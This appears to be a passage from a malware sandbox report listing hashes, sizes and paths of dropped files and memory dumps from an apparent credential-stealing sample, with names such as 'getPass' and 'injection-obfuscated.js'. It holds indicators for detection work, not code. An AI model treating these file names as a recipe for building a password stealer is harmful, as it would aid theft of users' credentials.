263c6c2848b43f2c2f7f10f5064b6e38

SHA1
464a04c1b196d9020fa836254eb1758b05c6be17

SHA256
ce1bdc2cac26980dec5dcbed17bbfd74fad08bf77d5b3e69321e4ced78cdd4be

SHA512
ba4030c234f67d7d6ba8bcb1cb117baf833f1ecd9ef9cf7364af1b4d8feb098740b1e559dc5ab1857d605469a18ef08649c64b679e9d3e1b1b5a444511895eee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\getPass

Filesize
209KB

MD5
a0ab52d2a84dc59351b8b80ab0ee25c5

SHA1
5bb82ab6c10e239a3b46c722903a14995b541d44

SHA256
1c43bcad4652a12f27664459a8f6b04e69ebb630f5cd6b6c610e98fc1664c813

SHA512
d9e351605e86c290beea37b5a7c3e1499dd12ca169543e8e0bdd67fcd0be75166d3d35f7ce1cd208297674510ae577471d401c2f0546dd23fd03d2ac0b666e07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\injection-obfuscated.js

Filesize
32KB

MD5
f421db9f34f345d816206f6554d11c29

SHA1
ecfc28673328191acbfaa1aa6e7588963e9da04c

SHA256
b99e8f5b7f4f7adfba03ea429478a2b21ff4fe481e8820768ab4f04ba8e5b3ba

SHA512
b29a302a372c0d352bfde27d14dbd5ac3f5a438371ee2c9cafb6030a47209b706c9bae65ade55d23c4114ce63204ff003e27059bf9a99cc731b80b2288c33905

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\libcrypto-1_1.dll

Filesize
1.1MB

MD5
205412dc7f3cd894644a96e97e1a3cb8

SHA1
e80a8254a3a4d7db7d3db5b18640db34c0648d3e

SHA256
adebe92032896cc3eab9d28563b129ad6910ee368dcb98997c742b4054716be9

SHA512
22535daaa0704e3158d03f6f2890c4f6a08c3d6ca4593d9bdf4fc437b06cb03fc383d18cf9b99a230c29d36929e69bda89c558e2c09ff3ea6bfbf4b4cdad65c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\libssl-1_1.dll

Filesize
200KB

MD5
d879b60a4500e5a7d1779d20e43a8edc

SHA1
730a6625745639073565d66530335aae30934cbf

SHA256
7245ff47c2e6e39d06935060fb045c688eb8c170bfdeb0174954c0c65055923c

SHA512
fa0f0b4d42b16fbb44f0c2c0c9ad60985be796b8838217a9d756e918e17c73ffefff9353f6fa4f9ba7066a5019a888a3d2399c10b21a4079df1667e1c6df2073

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\python310.dll

Filesize
1.4MB

MD5
dccf77f6ab7c6600e8b46280020b7902

SHA1
fd50cdf5dcfa34146fb82820fcc680c26b7aa64f

SHA256
f33ed93ae4b6011c8be2802304a759a5d2de8fd14c5dc34d0232aa4f8389766b

SHA512
42656f0f7e62454a763aa665cd31025a6bc4fb3802da4d4e3e151e2ffde3a651afce2d5e56b16c3e8215057c260248e683968d57940ff789f97ffb2d840b9a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\pywin32_system32\pywintypes310.dll

Filesize
61KB

MD5
260503686baf93abb6ab792a55d145b9

SHA1
75f1aeb58d337da12fcc89ef5c44608c68522792

SHA256
e954b72587d970b242aeed266ca59e83af22c80434655f1cb9df1890053720ec

SHA512
db4fd199d2a356990e9c4e06d13cd5bdd92bf71a46c8bcc99e968871eceea30d6113d3d812d7e8335b96fa8e42b706fd0748b3b9d8a6b8fb54aa5a34e6fc8f47

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\select.pyd

Filesize
24KB

MD5
e29fac3a4f749e4d49cca9c443a67997

SHA1
dcb985390615076e0a7e58dd494c2944c2164fbc

SHA256
6b4527434453393834c7e2701321a913d93ad747b3eebb8c3788d9a92576e00e

SHA512
b53d500e95ed5d62c597f6af2940854eae67f28d49d0c9b1ab7c978ff66dd25fd30c3c20bd59d716ad546bdc66309bff50663874cf39eec9bbb70c82f6037dd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\sqlite3.dll

Filesize
605KB

MD5
f1262fa91f96f16a50410c1ea489c4ca

SHA1
3de007af0ae3c22d40d7d20f46d76a7d66fd3948

SHA256
b06d9310a46ac6ef1c6be6536fd794279790686a791b86f830abed00de2ccb5d

SHA512
9ce16f89d3eb953b92fade0eff19f28f0d5023a38bf6a7ceae68b3d28b6e9c2b93a5b82828ad8fe3b96e500010a6f39c7b728b2580f2a56b37d6f4b570ddbfa3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\unicodedata.pyd

Filesize
288KB

MD5
3f17464857c1d6fc317dd37ac60f33e3

SHA1
565fa2cf2fab407fe3fbfa4c49af43efada051a5

SHA256
60f811169ca85973b5253d3c5eebad20fd0b1285d7a9f1f309242cf7f2f37e24

SHA512
7fad688708762c974e043731fc92da2c0ee1e2b1f44c41cce65beae63d13c97f1216d389b14836217cab6701d550aae21c88b94a34a1c3ab3af4f601178fe1a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\win32crypt.pyd

Filesize
51KB

MD5
84fb136966962f800056089e4512a36b

SHA1
b88175029f906a04ca4ad94720259fe6e5c80e0f

SHA256
97d3db3d93259b5fe258ed1295f4ac843772e6865a8b3969d3531580db755bed

SHA512
aa9f2bb061dd6d7b11b7e90e91e40b535297419f180ac710f1c79d3a8d7940c1bd8b7f70ee7ba7e00936094ee73cf9da50b505ae0984f7f6dcb5fbc22a768139

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_viyhtrgr.yoe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 950795.crdownload

Filesize
21.4MB

MD5
8620a04988beba0cd5121322ac503f5f

SHA1
fb3e963e38730a6bfa29dbd4eb5438d51e4a723a

SHA256
199285d8794a9c077b7d43e00d0b31e78066a847376c12cf80f8bb115344ebaa

SHA512
8a74dc3e54594b1db986ddfb2637cec3f870065feb120b1dad722adbe41bb1a6df655c09cae14148e2ced44379f7e552dcc384fb7c2c3540d6e19ca7bfcd995b

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
memory/5564-323-0x00000239F5F70000-0x00000239F5F92000-memory.dmp

Filesize
136KB

Download
memory/5840-564-0x00007FFF4AAA0000-0x00007FFF4AE17000-memory.dmp

Filesize
3.5MB

Download
memory/5840-558-0x00007FFF4D660000-0x00007FFF4D68D000-memory.dmp

Filesize
180KB

Download
memory/5840-561-0x00007FFF61570000-0x00007FFF6157D000-memory.dmp

Filesize
52KB

Download
memory/5840-559-0x00007FFF4D640000-0x00007FFF4D659000-memory.dmp

Filesize
100KB

Download
memory/5840-562-0x00007FFF4D5F0000-0x00007FFF4D61E000-memory.dmp

Filesize
184KB

Download
memory/5840-571-0x00007FFF4C050000-0x00007FFF4C4BE000-memory.dmp

Filesize
4.4MB

Download
memory/5840-573-0x00007FFF4D490000-0x00007FFF4D4BF000-memory.dmp

Filesize
188KB

Download
memory/5840-572-0x00007FFF4D4C0000-0x00007FFF4D4EB000-memory.dmp

Filesize
172KB

Download
memory/5840-563-0x00007FFF4D530000-0x00007FFF4D5E7000-memory.dmp

Filesize
732KB

Download
memory/5840-560-0x00007FFF4D620000-0x00007FFF4D639000-memory.dmp

Filesize
100KB

Download
memory/5840-557-0x00007FFF4C050000-0x00007FFF4C4BE000-memory.dmp

Filesize
4.4MB

Download
memory/5840-631-0x00007FFF49D90000-0x00007FFF49EA8000-memory.dmp

Filesize
1.1MB

Download
memory/5840-565-0x000002A9826F0000-0x000002A982A67000-memory.dmp

Filesize
3.5MB

Download
memory/5840-568-0x00007FFF4D4F0000-0x00007FFF4D50F000-memory.dmp

Filesize
124KB

Download
memory/5840-567-0x00007FFF5EA60000-0x00007FFF5EA6D000-memory.dmp

Filesize
52KB

Download
memory/5840-570-0x00007FFF4BAC0000-0x00007FFF4BD10000-memory.dmp

Filesize
2.3MB

Download
memory/5840-569-0x00007FFF4BEE0000-0x00007FFF4C049000-memory.dmp

Filesize
1.4MB

Download
memory/5840-566-0x00007FFF4D510000-0x00007FFF4D524000-memory.dmp

Filesize
80KB

Download
memory/6136-293-0x00007FFF4CA20000-0x00007FFF4CD97000-memory.dmp

Filesize
3.5MB

Download
memory/6136-367-0x00007FFF4C4C0000-0x00007FFF4C5D8000-memory.dmp

Filesize
1.1MB

Download
memory/6136-425-0x00007FFF511D0000-0x00007FFF511E9000-memory.dmp

Filesize
100KB

Download
memory/6136-270-0x00007FFF4CE60000-0x00007FFF4D2CE000-memory.dmp

Filesize
4.4MB

Download
memory/6136-274-0x00007FFF61580000-0x00007FFF615AD000-memory.dmp

Filesize
180KB

Download
memory/6136-486-0x00007FFF4ED00000-0x00007FFF4ED2E000-memory.dmp

Filesize
184KB

Download
memory/6136-498-0x00007FFF4C890000-0x00007FFF4C9F9000-memory.dmp

Filesize
1.4MB

Download
memory/6136-504-0x00007FFF4CDA0000-0x00007FFF4CE57000-memory.dmp

Filesize
732KB

Download
memory/6136-506-0x000002383C8D0000-0x000002383CC47000-memory.dmp

Filesize
3.5MB

Download
memory/6136-505-0x00007FFF4CA20000-0x00007FFF4CD97000-memory.dmp

Filesize
3.5MB

Download
memory/6136-503-0x00007FFF50A00000-0x00007FFF50A42000-memory.dmp

Filesize
264KB

Download
memory/6136-502-0x00007FFF4C4C0000-0x00007FFF4C5D8000-memory.dmp

Filesize
1.1MB

Download
memory/6136-501-0x00007FFF4C5E0000-0x00007FFF4C60F000-memory.dmp

Filesize
188KB

Download
memory/6136-500-0x00007FFF4C610000-0x00007FFF4C63B000-memory.dmp

Filesize
172KB

Download
memory/6136-499-0x00007FFF4C640000-0x00007FFF4C890000-memory.dmp

Filesize
2.3MB

Download
memory/6136-497-0x00007FFF4CA00000-0x00007FFF4CA1F000-memory.dmp

Filesize
124KB

Download
memory/6136-487-0x00007FFF4CE60000-0x00007FFF4D2CE000-memory.dmp

Filesize
4.4MB

Download
memory/6136-384-0x00007FFF50A00000-0x00007FFF50A42000-memory.dmp

Filesize
264KB

Download
memory/6136-366-0x00007FFF61580000-0x00007FFF615AD000-memory.dmp

Filesize
180KB

Download
memory/6136-309-0x00007FFF4CE60000-0x00007FFF4D2CE000-memory.dmp

Filesize
4.4MB

Download
memory/6136-311-0x00007FFF4C640000-0x00007FFF4C890000-memory.dmp

Filesize
2.3MB

Download
memory/6136-315-0x00007FFF4C610000-0x00007FFF4C63B000-memory.dmp

Filesize
172KB

Download
memory/6136-316-0x00007FFF4C5E0000-0x00007FFF4C60F000-memory.dmp

Filesize
188KB

Download
memory/6136-302-0x00007FFF4F120000-0x00007FFF4F134000-memory.dmp

Filesize
80KB

Download
memory/6136-303-0x00007FFF61850000-0x00007FFF6185D000-memory.dmp

Filesize
52KB

Download
memory/6136-306-0x00007FFF4C890000-0x00007FFF4C9F9000-memory.dmp

Filesize
1.4MB

Download
memory/6136-305-0x00007FFF4CA00000-0x00007FFF4CA1F000-memory.dmp

Filesize
124KB

Download
memory/6136-287-0x00007FFF62190000-0x00007FFF6219D000-memory.dmp

Filesize
52KB

Download
memory/6136-294-0x000002383C8D0000-0x000002383CC47000-memory.dmp

Filesize
3.5MB

Download
memory/6136-292-0x00007FFF4CDA0000-0x00007FFF4CE57000-memory.dmp

Filesize
732KB

Download
memory/6136-288-0x00007FFF4ED00000-0x00007FFF4ED2E000-memory.dmp

Filesize
184KB

Download
memory/6136-280-0x00007FFF511D0000-0x00007FFF511E9000-memory.dmp

Filesize
100KB

Download
memory/6136-277-0x00007FFF61FE0000-0x00007FFF61FF9000-memory.dmp

Filesize
100KB

Download
memory/7156-444-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/7156-426-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download